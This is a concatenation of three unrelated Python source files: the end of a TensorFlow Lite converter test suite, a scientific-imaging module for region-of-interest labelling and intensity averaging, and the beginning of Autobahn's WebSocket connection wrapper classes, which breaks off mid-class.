self.assertEqual(expected_value, actual_value)
@test_util.run_v2_only
def testGraphDebugInfo(self):
"""Test a SavedModel has debug info captured."""
input_data = constant_op.constant(1., shape=[1])
root = tracking.AutoTrackable()
root.f = def_function.function(lambda x: 2. * x)
to_save = root.f.get_concrete_function(input_data)
options = save_options.SaveOptions(save_debug_info=True)
save_dir = os.path.join(self.get_temp_dir(), 'saved_model')
save(root, save_dir, to_save, options)
# Convert model and ensure model is not None.
converter = lite.TFLiteConverterV2.from_saved_model(save_dir)
converter.convert()
self._assertValidDebugInfo(converter._debug_info)
class FromKerasModelTest(TestModels):
@test_util.run_v2_only
def testSequentialModel(self):
"""Test a simple sequential tf.Keras model."""
input_data = constant_op.constant(1., shape=[1, 1])
# Create a simple Keras model.
x = np.array([[1.], [2.]])
y = np.array([[2.], [4.]])
model = keras.models.Sequential([
keras.layers.Dropout(0.2),
keras.layers.Dense(units=1, input_shape=[1])
])
model.compile(optimizer='sgd', loss='mean_squared_error')
model.fit(x, y, epochs=1)
# Convert model and ensure model is not None.
converter = lite.TFLiteConverterV2.from_keras_model(model)
tflite_model = converter.convert()
# Check values from converted model.
expected_value = model.predict(input_data)
actual_value = self._evaluateTFLiteModel(tflite_model, [input_data])
self.assertEqual(expected_value, actual_value)
@test_util.run_v2_only
def testSequentialMultiInputOutputModel(self):
"""Test a tf.Keras model with multiple inputs and outputs."""
left_input_data = constant_op.constant(1., shape=[1, 3])
right_input_data = constant_op.constant(1., shape=[1, 3])
# Create a simple Keras model.
input_a_np = np.random.random((10, 3))
input_b_np = np.random.random((10, 3))
output_c_np = np.random.random((10, 3))
output_d_np = np.random.random((10, 2))
input_a = keras.layers.Input(shape=(3,), name='input_a')
input_b = keras.layers.Input(shape=(3,), name='input_b')
dense = keras.layers.Dense(8, name='dense_1')
interm_a = dense(input_a)
interm_b = dense(input_b)
merged = keras.layers.concatenate([interm_a, interm_b], name='merge')
output_c = keras.layers.Dense(
3, activation='softmax', name='dense_2')(
merged)
output_d = keras.layers.Dense(
2, activation='softmax', name='dense_3')(
merged)
model = keras.models.Model(
inputs=[input_a, input_b], outputs=[output_c, output_d])
model.compile(optimizer='sgd', loss='mean_squared_error')
model.fit([input_a_np, input_b_np], [output_c_np, output_d_np], epochs=1)
# Convert model and ensure model is not None.
converter = lite.TFLiteConverterV2.from_keras_model(model)
tflite_model = converter.convert()
# Check values from converted model.
input_data = [left_input_data, right_input_data]
expected_value = model.predict(input_data)
actual_value = self._evaluateTFLiteModel(tflite_model, input_data)
for tf_result, tflite_result in zip(expected_value, actual_value):
np.testing.assert_almost_equal(tf_result, tflite_result, 5)
@test_util.run_v2_only
def testGraphDebugInfo(self):
"""Test a tf.Keras model has debug info captured."""
# Create a simple Keras model.
x = [-1, 0, 1, 2, 3, 4]
y = [-3, -1, 1, 3, 5, 7]
model = keras.models.Sequential(
[keras.layers.Dense(units=1, input_shape=[1])])
model.compile(optimizer='sgd', loss='mean_squared_error')
model.fit(x, y, epochs=1)
converter = lite.TFLiteConverterV2.from_keras_model(model)
converter.convert()
self._assertValidDebugInfo(converter._debug_info)
class ControlFlowTest(TestModels):
@test_util.run_v2_only
def testCond(self):
input_data = {
'x': constant_op.constant([1., 2.], shape=[1, 2]),
'b': constant_op.constant(True)
}
weights = variables.Variable([[0.1, 0.2], [0.3, 0.4]], dtype=dtypes.float32)
def true_fn(x):
return math_ops.matmul(x, weights)
def false_fn(x):
return math_ops.add(x, weights)
@def_function.function(input_signature=[
tensor_spec.TensorSpec(shape=[1, 2], dtype=dtypes.float32),
tensor_spec.TensorSpec(shape=(), dtype=dtypes.bool)
])
def model(x, b):
return control_flow_ops.cond(
b, true_fn=lambda: true_fn(x), false_fn=lambda: false_fn(x))
concrete_func = model.get_concrete_function()
# Convert model.
converter = lite.TFLiteConverterV2.from_concrete_functions([concrete_func])
converter.experimental_new_converter = True
tflite_model = converter.convert()
# Check values from converted model.
expected_value = concrete_func(**input_data)
actual_value = self._evaluateTFLiteModel(
tflite_model, [input_data['x'], input_data['b']])[0]
np.testing.assert_almost_equal(expected_value.numpy(), actual_value)
@test_util.run_v2_only
def testStaticRnn(self):
input_data = constant_op.constant(
np.array(np.random.random_sample((3, 10)), dtype=np.float32))
cell = rnn_cell_impl.LSTMCell(10)
@def_function.function(input_signature=[
tensor_spec.TensorSpec(shape=[3, 10], dtype=dtypes.float32)
])
def model(x):
seq = array_ops.split(x, 3, 0)
return rnn.static_rnn(
cell, seq, dtype=dtypes.float32, sequence_length=[1])
concrete_func = model.get_concrete_function()
# Convert model.
converter = lite.TFLiteConverterV2.from_concrete_functions([concrete_func])
converter.experimental_new_converter = True
tflite_model = converter.convert()
# Check values from converted model.
expected_value = concrete_func(input_data)[0]
actual_value = self._evaluateTFLiteModel(tflite_model, [input_data])
for expected, actual in zip(expected_value, actual_value):
np.testing.assert_almost_equal(expected.numpy(), actual)
@test_util.run_v2_only
def testWhileLoop(self):
input_data = constant_op.constant([1., 2., 3., 4.], shape=[2, 2])
weights = variables.Variable([[0.1, 0.2], [0.3, 0.4]], dtype=dtypes.float32)
def condition(x):
return math_ops.reduce_sum(x) < 100
def body(x):
return math_ops.add(x, weights)
@def_function.function(input_signature=[
tensor_spec.TensorSpec(shape=[2, 2], dtype=dtypes.float32)
])
def model(x):
return control_flow_ops.while_loop(condition, body, [x])
concrete_func = model.get_concrete_function()
# Convert model.
converter = lite.TFLiteConverterV2.from_concrete_functions([concrete_func])
converter.experimental_new_converter = True
tflite_model = converter.convert()
# Check values from converted model.
expected_value = concrete_func(input_data)
actual_value = self._evaluateTFLiteModel(tflite_model, [input_data])[0]
np.testing.assert_almost_equal(expected_value.numpy(), actual_value)
@test_util.run_v2_only
def testDynamicRnn(self):
input_data = constant_op.constant(
np.array(np.random.random_sample((3, 10, 10)), dtype=np.float32))
cell = rnn_cell_impl.LSTMCell(10)
@def_function.function(input_signature=[
tensor_spec.TensorSpec(shape=[3, 10, 10], dtype=dtypes.float32)
])
def model(x):
return rnn.dynamic_rnn(cell, x, dtype=dtypes.float32)
concrete_func = model.get_concrete_function()
# Convert model.
converter = lite.TFLiteConverterV2.from_concrete_functions([concrete_func])
converter.experimental_new_converter = True
tflite_model = converter.convert()
# Check values from converted model.
expected_value = concrete_func(input_data)
actual_value = self._evaluateTFLiteModel(tflite_model, [input_data])
for expected, actual in zip(expected_value, actual_value):
if isinstance(expected, ops.EagerTensor):
expected = expected.numpy()
else:
expected = expected.c.numpy()
np.testing.assert_almost_equal(expected, actual)
@parameterized.named_parameters(('LSTM', recurrent_v2.LSTM),
('SimpleRNN', recurrent.SimpleRNN),
('GRU', recurrent_v2.GRU))
@test_util.run_v2_only
def testKerasRNN(self, rnn_layer):
# This relies on TFLiteConverter to rewrite the unknown batch size to 1.
# The model will fail if the input is resized to a batch size other than 1.
input_data = constant_op.constant(
np.array(np.random.random_sample((1, 10, 10)), dtype=np.float32))
rnn_obj = rnn_layer(units=10, input_shape=(10, 10))
model = keras.models.Sequential([rnn_obj])
# Convert model.
converter = lite.TFLiteConverterV2.from_keras_model(model)
converter.experimental_new_converter = True
tflite_model = converter.convert()
actual_value = self._evaluateTFLiteModel(tflite_model, [input_data])[0]
# Check values from converted model.
expected_value = model.predict(input_data)
np.testing.assert_almost_equal(expected_value, actual_value, decimal=5)
@parameterized.named_parameters(('LSTM', recurrent_v2.LSTM),
('SimpleRNN', recurrent.SimpleRNN),
('GRU', recurrent_v2.GRU))
@test_util.run_v2_only
def testKerasRNNMultiBatches(self, rnn_layer):
input_data = constant_op.constant(
np.array(np.random.random_sample((4, 10, 10)), dtype=np.float32))
# Specify a fixed batch size(4) for the test model.
x = keras.layers.Input(batch_shape=(4, 10, 10))
y = rnn_layer(units=10, input_shape=(10, 10))(x)
model = keras.Model(inputs=[x], outputs=[y])
# Convert model.
converter = lite.TFLiteConverterV2.from_keras_model(model)
converter.experimental_new_converter = True
tflite_model = converter.convert()
actual_value = self._evaluateTFLiteModel(tflite_model, [input_data])[0]
# Check values from converted model.
expected_value = model.predict(input_data)
np.testing.assert_almost_equal(expected_value, actual_value, decimal=5)
@test_util.run_v2_only
def testKerasBidirectionalRNN(self):
input_data = constant_op.constant(
np.array(np.random.random_sample((1, 10, 10)), dtype=np.float32))
model = keras.models.Sequential()
model.add(
keras.layers.Bidirectional(
recurrent_v2.LSTM(units=10, return_sequences=True),
input_shape=(10, 10)))
model.add(keras.layers.Bidirectional(recurrent_v2.LSTM(units=10)))
model.add(keras.layers.Dense(5))
model.add(keras.layers.Activation('softmax'))
# Convert model.
converter = lite.TFLiteConverterV2.from_keras_model(model)
converter.experimental_new_converter = True
tflite_model = converter.convert()
actual_value = self._evaluateTFLiteModel(tflite_model, [input_data])[0]
# Check values from converted model.
expected_value = model.predict(input_data)
np.testing.assert_almost_equal(expected_value, actual_value, decimal=5)
class GrapplerTest(TestModels):
@test_util.run_v2_only
def testConstantFolding(self):
# Constant folding handles the tf.broadcast_to operation, which was not
# supported by TFLite at the time this test was added.
input_data = constant_op.constant([1., 2., 3., 4., 5., 6., 7., 8., 9.],
shape=[3, 3])
@def_function.function
def func(x):
y_const = constant_op.constant([1., 2., 3.])
y_broadcast = gen_array_ops.broadcast_to(y_const, [3, 3])
return math_ops.matmul(x, y_broadcast)
root = tracking.AutoTrackable()
root.f = func
concrete_func = root.f.get_concrete_function(input_data)
# Convert model.
converter = lite.TFLiteConverterV2.from_concrete_functions([concrete_func])
tflite_model = converter.convert()
# Check values from converted model.
expected_value = root.f(input_data)
actual_value = self._evaluateTFLiteModel(tflite_model, [input_data])
np.testing.assert_almost_equal(expected_value.numpy(), actual_value[0])
# Enable hybrid quantization; the result should be the same.
converter.experimental_new_converter = True
converter.optimizations = [lite.Optimize.DEFAULT]
hybrid_tflite_model = converter.convert()
actual_value = self._evaluateTFLiteModel(hybrid_tflite_model, [input_data])
np.testing.assert_almost_equal(expected_value.numpy(), actual_value[0])
class UnknownShapes(TestModels):
@test_util.run_v2_only
def testMatMul(self):
input_data = constant_op.constant(
np.array(np.random.random_sample((10, 4)), dtype=np.float32))
@def_function.function(input_signature=[
tensor_spec.TensorSpec(shape=[None, 4], dtype=dtypes.float32)
])
def model(in_tensor):
shape = array_ops.shape_v2(in_tensor)
fill = array_ops.transpose_v2(array_ops.fill(shape, 1.))
return math_ops.matmul(fill, in_tensor)
concrete_func = model.get_concrete_function()
converter = lite.TFLiteConverterV2.from_concrete_functions([concrete_func])
converter.experimental_new_converter = True
tflite_model = converter.convert()
# Check values from converted model.
expected_value = concrete_func(input_data)
actual_value = self._evaluateTFLiteModel(
tflite_model, [input_data], input_shapes=[([-1, 4], [10, 4])])
np.testing.assert_almost_equal(
expected_value.numpy(), actual_value[0], decimal=6)
def testBatchMatMul(self):
self.skipTest('BatchMatMulV2 does not support unknown batch size.')
input_data_1 = constant_op.constant(
np.array(np.random.random_sample((1, 256, 256)), dtype=np.float32))
input_data_2 = constant_op.constant(
np.array(np.random.random_sample((1, 256, 256)), dtype=np.float32))
@def_function.function(input_signature=[
tensor_spec.TensorSpec(shape=[None, 256, 256], dtype=dtypes.float32),
tensor_spec.TensorSpec(shape=[None, 256, 256], dtype=dtypes.float32)
])
def model(in_tensor_1, in_tensor_2):
return math_ops.matmul(in_tensor_1, in_tensor_2)
concrete_func = model.get_concrete_function()
converter = lite.TFLiteConverterV2.from_concrete_functions([concrete_func])
converter.experimental_new_converter = True
tflite_model = converter.convert()
# Check values from converted model.
expected_value = concrete_func(input_data_1, input_data_2)
actual_value = self._evaluateTFLiteModel(
tflite_model, [input_data_1, input_data_2],
input_shapes=[([-1, 256, 256], [1, 256, 256])])
np.testing.assert_almost_equal(expected_value.numpy(), actual_value[0])
if __name__ == '__main__':
test.main()
|
|
# -*- coding: utf-8 -*-
# ######################################################################
# Copyright (c) 2014, Brookhaven Science Associates, Brookhaven #
# National Laboratory. All rights reserved. #
# #
# Redistribution and use in source and binary forms, with or without #
# modification, are permitted provided that the following conditions #
# are met: #
# #
# * Redistributions of source code must retain the above copyright #
# notice, this list of conditions and the following disclaimer. #
# #
# * Redistributions in binary form must reproduce the above copyright #
# notice this list of conditions and the following disclaimer in #
# the documentation and/or other materials provided with the #
# distribution. #
# #
# * Neither the name of the Brookhaven Science Associates, Brookhaven #
# National Laboratory nor the names of its contributors may be used #
# to endorse or promote products derived from this software without #
# specific prior written permission. #
# #
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS #
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT #
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS #
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE #
# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, #
# INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES #
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR #
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) #
# HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, #
# STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OTHERWISE) ARISING #
# IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE #
# POSSIBILITY OF SUCH DAMAGE. #
########################################################################
"""
This module contains convenience methods to generate ROI labeled arrays for
simple shapes such as rectangles and concentric circles.
"""
from __future__ import absolute_import, division, print_function
import collections
import logging
import scipy.ndimage.measurements as ndim
import numpy as np
from . import utils
logger = logging.getLogger(__name__)
def rectangles(coords, shape):
"""
This function will provide the indices array for rectangular regions of
interest.
Parameters
----------
coords : iterable
coordinates of the upper-left corner and width and height of each
rectangle: e.g., [(x, y, w, h), (x, y, w, h)]
shape : tuple
Image shape which is used to determine the maximum extent of output
pixel coordinates. Order is (rr, cc).
Returns
-------
label_array : array
Elements not inside any ROI are zero; elements inside each
ROI are 1, 2, 3, corresponding to the order they are specified
in coords. Order is (rr, cc).
"""
labels_grid = np.zeros(shape, dtype=np.int64)
for i, (col_coor, row_coor, col_val, row_val) in enumerate(coords):
left, right = np.max([col_coor, 0]), np.min([col_coor + col_val,
shape[0]])
top, bottom = np.max([row_coor, 0]), np.min([row_coor + row_val,
shape[1]])
slc1 = slice(left, right)
slc2 = slice(top, bottom)
if np.any(labels_grid[slc1, slc2]):
raise ValueError("overlapping ROIs")
# assign a different scalar for each roi
labels_grid[slc1, slc2] = (i + 1)
return labels_grid
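# Illustrative usage sketch (added for exposition; not part of the original
# module): label two non-overlapping 5x5 rectangles on a 10x10 grid. The
# coordinates and shape below are arbitrary example values.
def _example_rectangles_usage():
    labels = rectangles([(0, 0, 5, 5), (5, 5, 5, 5)], shape=(10, 10))
    # labels is 0 outside the rectangles, 1 inside the first and 2 inside
    # the second, following the order of `coords`.
    return labels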
def rings(edges, center, shape):
"""
Draw annular (ring-shaped) regions of interest.
Each ring will be labeled with an integer. Regions outside any ring will
be filled with zeros.
Parameters
----------
edges: list
giving the inner and outer radius of each ring
e.g., [(1, 2), (11, 12), (21, 22)]
center : tuple
point in image where r=0; may be a float giving subpixel precision.
Order is (rr, cc).
shape: tuple
Image shape which is used to determine the maximum extent of output
pixel coordinates. Order is (rr, cc).
Returns
-------
label_array : array
Elements not inside any ROI are zero; elements inside each
ROI are 1, 2, 3, corresponding to the order they are specified
in edges.
"""
edges = np.atleast_2d(np.asarray(edges)).ravel()
if len(edges) % 2 != 0:
raise ValueError("edges should have an even number of elements, "
"giving inner, outer radii for each ring")
if not np.all(np.diff(edges) >= 0):
raise ValueError("edges are expected to be monotonically increasing, "
"giving inner and outer radii of each ring from "
"r=0 outward")
r_coord = utils.radial_grid(center, shape).ravel()
label_array = np.digitize(r_coord, edges, right=False)
# Even elements of label_array are in the space between rings.
label_array = (np.where(label_array % 2 != 0, label_array, 0) + 1) // 2
return label_array.reshape(shape)
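# Illustrative usage sketch (added for exposition; not part of the original
# module): label two annular ROIs on a small grid by passing explicit
# (inner, outer) radii. The radii, center and shape are arbitrary examples.
def _example_rings_usage():
    labels = rings([(1, 3), (3, 5)], center=(5.0, 5.0), shape=(11, 11))
    # Pixels with radius in [1, 3) get label 1, radius in [3, 5) get label 2,
    # and all remaining pixels stay 0.
    return labels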
def ring_edges(inner_radius, width, spacing=0, num_rings=None):
"""
Calculate the inner and outer radius of a set of rings.
The number of rings, their widths, and any spacing between rings can be
specified. They can be uniform or varied.
Parameters
----------
inner_radius : float
inner radius of the inner-most ring
width : float or list of floats
ring thickness
If a float, all rings will have the same thickness.
spacing : float or list of floats, optional
margin between rings, 0 by default
If a float, all rings will have the same spacing. If a list,
the length of the list must be one less than the number of
rings.
num_rings : int, optional
number of rings
Required if width and spacing are not lists and number
cannot thereby be inferred. If it is given and can also be
inferred, input is checked for consistency.
Returns
-------
edges : array
inner and outer radius for each ring
Example
-------
# Make two rings starting at r=1px, each 5px wide
>>> ring_edges(inner_radius=1, width=5, num_rings=2)
[(1, 6), (6, 11)]
# Make three rings of different widths and spacings.
# Since the width and spacings are given individually, the number of
# rings here is simply inferred.
>>> ring_edges(inner_radius=1, width=(5, 4, 3), spacing=(1, 2))
[(1, 6), (7, 11), (13, 16)]
"""
# All of this input validation merely checks that width, spacing, and
# num_rings are self-consistent and complete.
width_is_list = isinstance(width, collections.Iterable)
spacing_is_list = isinstance(spacing, collections.Iterable)
if (width_is_list and spacing_is_list):
if len(spacing) != len(width) - 1:
raise ValueError("List of spacings must be one less than list "
"of widths.")
if num_rings is None:
try:
num_rings = len(width)
except TypeError:
try:
num_rings = len(spacing) + 1
except TypeError:
raise ValueError("Since width and spacing are constant, "
"num_rings cannot be inferred and must be "
"specified.")
else:
if width_is_list:
if num_rings != len(width):
raise ValueError("num_rings does not match width list")
if spacing_is_list:
if num_rings-1 != len(spacing):
raise ValueError("num_rings does not match spacing list")
# Now regularize the input.
if not width_is_list:
width = np.ones(num_rings) * width
if not spacing_is_list:
spacing = np.ones(num_rings - 1) * spacing
# The inner radius is the first "spacing."
all_spacings = np.insert(spacing, 0, inner_radius)
steps = np.array([all_spacings, width]).T.ravel()
edges = np.cumsum(steps).reshape(-1, 2)
return edges
def segmented_rings(edges, segments, center, shape, offset_angle=0):
"""
Parameters
----------
edges : array
inner and outer radius for each ring
segments : int or list
number of pie slices or list of angles in radians
That is, 8 produces eight equal-sized angular segments,
whereas a list can be used to produce segments of unequal size.
center : tuple
point in image where r=0; may be a float giving subpixel precision.
Order is (rr, cc).
shape: tuple
Image shape which is used to determine the maximum extent of output
pixel coordinates. Order is (rr, cc).
offset_angle : float or array, optional
offset in radians from angle=0 along the positive X axis
Returns
-------
label_array : array
Elements not inside any ROI are zero; elements inside each
ROI are 1, 2, 3, corresponding to the order they are specified
in edges and segments
"""
edges = np.asarray(edges).ravel()
if len(edges) % 2 != 0:
raise ValueError("edges should have an even number of elements, "
"giving inner, outer radii for each ring")
if not np.all(np.diff(edges) >= 0):
raise ValueError("edges are expected to be monotonically increasing, "
"giving inner and outer radii of each ring from "
"r=0 outward")
agrid = utils.angle_grid(center, shape)
agrid[agrid < 0] = 2*np.pi + agrid[agrid < 0]
segments_is_list = isinstance(segments, collections.Iterable)
if segments_is_list:
segments = np.asarray(segments) + offset_angle
else:
# N equal segments requires N+1 bin edges spanning 0 to 2pi.
segments = np.linspace(0, 2*np.pi, num=1+segments, endpoint=True)
segments += offset_angle
# The indices of the bins (angles) to which each value in the input
# array (agrid) belongs.
ind_grid = (np.digitize(np.ravel(agrid), segments,
right=False)).reshape(shape)
label_array = np.zeros(shape, dtype=np.int64)
# radius grid for the image_shape
rgrid = utils.radial_grid(center, shape)
# assign indices value according to angles then rings
len_segments = len(segments)
for i in range(len(edges) // 2):
indices = (edges[2*i] <= rgrid) & (rgrid < edges[2*i + 1])
# Combine "segment #" and "ring #" to get unique label for each.
label_array[indices] = ind_grid[indices] + (len_segments - 1) * i
return label_array
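# Illustrative usage sketch (added for exposition; not part of the original
# module): combine ring_edges and segmented_rings to split two rings into
# four angular segments each, giving labels 1..8. Values are arbitrary
# examples.
def _example_segmented_rings_usage():
    edges = ring_edges(inner_radius=2, width=3, num_rings=2)
    labels = segmented_rings(edges, segments=4, center=(10.0, 10.0),
                             shape=(21, 21))
    return labels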
def roi_max_counts(images_sets, label_array):
"""
Return the brightest pixel in any ROI in any image in the image set.
Parameters
----------
images_sets : iterable
iterable of image sets (each an iterable of 2D images)
shape is: (len(images_sets), )
label_array : array
labeled array; 0 is background.
Each ROI is represented by a distinct label (i.e., integer).
Returns
-------
max_counts : int
maximum pixel counts
"""
max_cts = 0
for img_set in images_sets:
for img in img_set:
max_cts = max(max_cts, ndim.maximum(img, label_array))
return max_cts
def roi_pixel_values(image, labels, index=None):
"""
This will provide the intensities of the ROIs of the labeled array
according to the pixel list,
e.g., the intensities of the rings of the labeled array.
Parameters
----------
image : array
image data dimensions are: (rr, cc)
labels : array
labeled array; 0 is background.
Each ROI is represented by a distinct label (i.e., integer).
index : list, optional
labels list
eg: 5 ROIs
index = [1, 2, 3, 4, 5]
Returns
-------
roi_pix : list
intensities of the ROIs of the labeled array according
to the pixel list
index : list
labels for which pixel intensities were extracted
"""
if labels.shape != image.shape:
raise ValueError("Shape of the image data should be equal to"
" shape of the labeled array")
if index is None:
index = np.arange(1, np.max(labels) + 1)
roi_pix = []
for n in index:
roi_pix.append(image[labels == n])
return roi_pix, index
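# Illustrative usage sketch (added for exposition; not part of the original
# module): pull per-ROI pixel intensities out of a random image using a
# rectangle label array. The image size and ROI coordinates are arbitrary
# examples.
def _example_roi_pixel_values_usage():
    img = np.random.random((10, 10))
    labels = rectangles([(0, 0, 5, 5), (5, 5, 5, 5)], shape=(10, 10))
    roi_pix, index = roi_pixel_values(img, labels)
    # roi_pix[0] holds the 25 pixels of ROI 1, roi_pix[1] those of ROI 2;
    # index is [1, 2].
    return roi_pix, index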
def mean_intensity_sets(images_set, labels):
"""
Mean intensities for ROIs of the labeled array for different image sets
Parameters
----------
images_set : iterable
iterable of image sets
shape is: (len(images_sets), )
each image set is an iterable of 2D arrays; dimensions are: (rr, cc)
labels : array
labeled array; 0 is background.
Each ROI is represented by a distinct label (i.e., integer).
Returns
-------
mean_intensity_list : list
average intensity of each ROI as a list
shape len(images_sets)
index_list : list
labels list for each image set
"""
return tuple(map(list,
zip(*[mean_intensity(im,
labels) for im in images_set])))
def mean_intensity(images, labels, index=None):
"""
Mean intensities for ROIs of the labeled array for a set of images
Parameters
----------
images : array
Intensity array of the images
dimensions are: (num_img, num_rows, num_cols)
labels : array
labeled array; 0 is background.
Each ROI is represented by a distinct label (i.e., integer).
index : list, optional
labels list
eg: 5 ROIs
index = [1, 2, 3, 4, 5]
Returns
-------
mean_intensity : array
mean intensity of each ROI for the set of images as an array
shape (len(images), number of labels)
"""
if labels.shape != images[0].shape:
raise ValueError("Shape of the images should be equal to"
" shape of the label array")
if index is None:
index = np.arange(1, np.max(labels) + 1)
mean_intensity = np.zeros((images.shape[0], index.shape[0]))
for n, img in enumerate(images):
mean_intensity[n] = ndim.mean(img, labels, index=index)
return mean_intensity, index
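# Illustrative usage sketch (added for exposition; not part of the original
# module): per-image mean intensity of a single rectangular ROI over a small
# stack of random images. The stack size and ROI are arbitrary examples.
def _example_mean_intensity_usage():
    images = np.random.random((4, 10, 10))
    labels = rectangles([(0, 0, 5, 5)], shape=(10, 10))
    means, index = mean_intensity(images, labels)
    # means has shape (4, 1): one mean per image per ROI; index is [1].
    return means, index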
def combine_mean_intensity(mean_int_list, index_list):
"""
Combine the mean intensities of the images (all image sets) for each ROI,
provided the label lists of all the image sets are the same.
Parameters
----------
mean_int_list : list
mean intensity of each ROI as a list
shape is: (len(images_sets), )
index_list : list
labels list for each image set
Returns
-------
combine_mean_int : array
combine mean intensities of image sets for each ROI of labeled array
shape (number of images in all image sets, number of labels)
"""
if all(np.array_equal(x, index_list[0]) for x in index_list):
combine_mean_intensity = np.vstack(mean_int_list)
else:
raise ValueError("Labels list for the image sets are different")
return combine_mean_intensity
def circular_average(image, calibrated_center, threshold=0, nx=100,
pixel_size=None):
"""
Circular average (radial integration) of the intensity distribution of
the image data.
Parameters
----------
image : array
input image
calibrated_center : tuple
The center in pixels-units (row, col)
threshold : int, optional
minimum pixel count for a radial bin to be included; bins with
counts <= threshold are masked out
nx : int, optional
number of bins
pixel_size : tuple, optional
The size of a pixel in real units. (height, width). (mm)
Returns
-------
bin_centers : array
bin centers from bin edges
shape [nx]
ring_averages : array
circular integration of intensity
"""
radial_val = utils.radial_grid(calibrated_center, image.shape,
pixel_size)
bin_edges, sums, counts = utils.bin_1D(np.ravel(radial_val),
np.ravel(image), nx)
th_mask = counts > threshold
ring_averages = sums[th_mask] / counts[th_mask]
bin_centers = utils.bin_edges_to_centers(bin_edges)[th_mask]
return bin_centers, ring_averages
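# Illustrative usage sketch (added for exposition; not part of the original
# module): radially average a random image about its center. The image size,
# center and bin count are arbitrary examples.
def _example_circular_average_usage():
    img = np.random.random((64, 64))
    bin_centers, ring_averages = circular_average(img, (32.0, 32.0), nx=20)
    # Both outputs have at most nx entries; bins whose pixel count does not
    # exceed `threshold` are dropped.
    return bin_centers, ring_averages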
def roi_kymograph(images, labels, num):
"""
This function will provide data for a graphical representation of pixel
variation over time for the required ROI.
Parameters
----------
images : array
Intensity array of the images
dimensions are: (num_img, num_rows, num_cols)
labels : array
labeled array; 0 is background.
Each ROI is represented by a distinct label (i.e., integer).
num : int
required ROI label
Returns
-------
roi_kymograph : array
data for graphical representation of pixels variation over time
for required ROI
"""
roi_kymo = []
for n, img in enumerate(images):
roi_kymo.append((roi_pixel_values(img,
labels == num)[0])[0])
return np.matrix(roi_kymo)
|
|
###############################################################################
#
# The MIT License (MIT)
#
# Copyright (c) Tavendo GmbH
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
#
###############################################################################
from __future__ import absolute_import
import json
import six
__all__ = (
'ConnectionRequest',
'ConnectionResponse',
'ConnectionAccept',
'ConnectionDeny',
'Message',
'IncomingMessage',
'OutgoingMessage',
)
class ConnectionRequest(object):
"""
Thin wrapper for WebSocket connection request information provided in
:meth:`autobahn.websocket.protocol.WebSocketServerProtocol.onConnect` when
a WebSocket client wants to establish a connection to a WebSocket server.
"""
__slots__ = (
'peer',
'headers',
'host',
'path',
'params',
'version',
'origin',
'protocols',
'extensions'
)
def __init__(self, peer, headers, host, path, params, version, origin, protocols, extensions):
"""
:param peer: Descriptor of the connecting client (e.g. IP address/port in case of TCP transports).
:type peer: str
:param headers: HTTP headers from opening handshake request.
:type headers: dict
:param host: Host from opening handshake HTTP header.
:type host: str
:param path: Path from requested HTTP resource URI. For example, a resource URI of `/myservice?foo=23&foo=66&bar=2` will be parsed to `/myservice`.
:type path: str
:param params: Query parameters (if any) from requested HTTP resource URI. For example, a resource URI of `/myservice?foo=23&foo=66&bar=2` will be parsed to `{'foo': ['23', '66'], 'bar': ['2']}`.
:type params: dict of arrays of strings
:param version: The WebSocket protocol version the client announced (and will be spoken, when connection is accepted).
:type version: int
:param origin: The WebSocket origin header or None. Note that this is only a reliable source of information for browser clients!
:type origin: str
:param protocols: The WebSocket (sub)protocols the client announced. You must select and return one of those (or None) in :meth:`autobahn.websocket.WebSocketServerProtocol.onConnect`.
:type protocols: list of str
:param extensions: The WebSocket extensions the client requested and the server accepted (and thus will be spoken, when WS connection is established).
:type extensions: list of str
"""
self.peer = peer
self.headers = headers
self.host = host
self.path = path
self.params = params
self.version = version
self.origin = origin
self.protocols = protocols
self.extensions = extensions
def __json__(self):
return {'peer': self.peer,
'headers': self.headers,
'host': self.host,
'path': self.path,
'params': self.params,
'version': self.version,
'origin': self.origin,
'protocols': self.protocols,
'extensions': self.extensions}
def __str__(self):
return json.dumps(self.__json__())
class ConnectionResponse(object):
"""
Thin wrapper for WebSocket connection response information provided in
:meth:`autobahn.websocket.protocol.WebSocketClientProtocol.onConnect` when
a WebSocket server has accepted a connection request by a client.
"""
__slots__ = (
'peer',
'headers',
'version',
'protocol',
'extensions'
)
def __init__(self, peer, headers, version, protocol, extensions):
"""
Constructor.
:param peer: Descriptor of the connected server (e.g. IP address/port in case of TCP transport).
:type peer: str
:param headers: HTTP headers from opening handshake response.
:type headers: dict
:param version: The WebSocket protocol version that is spoken.
:type version: int
:param protocol: The WebSocket (sub)protocol in use.
:type protocol: str
:param extensions: The WebSocket extensions in use.
:type extensions: list of str
"""
self.peer = peer
self.headers = headers
self.version = version
self.protocol = protocol
self.extensions = extensions
def __json__(self):
return {'peer': self.peer,
'headers': self.headers,
'version': self.version,
'protocol': self.protocol,
